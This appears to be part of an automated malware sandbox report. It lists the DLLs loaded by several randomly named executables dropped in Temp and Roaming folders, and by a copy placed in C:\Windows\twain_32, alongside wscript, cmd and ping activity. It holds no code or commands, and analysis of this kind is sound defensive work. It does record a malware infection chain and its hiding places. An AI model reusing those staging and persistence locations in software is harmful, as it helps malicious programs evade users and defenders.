Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: ????.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Section loaded: schannel.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: ktmw32.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: winmm.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: winmmbase.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: devobj.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: ksuser.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: avrt.dll
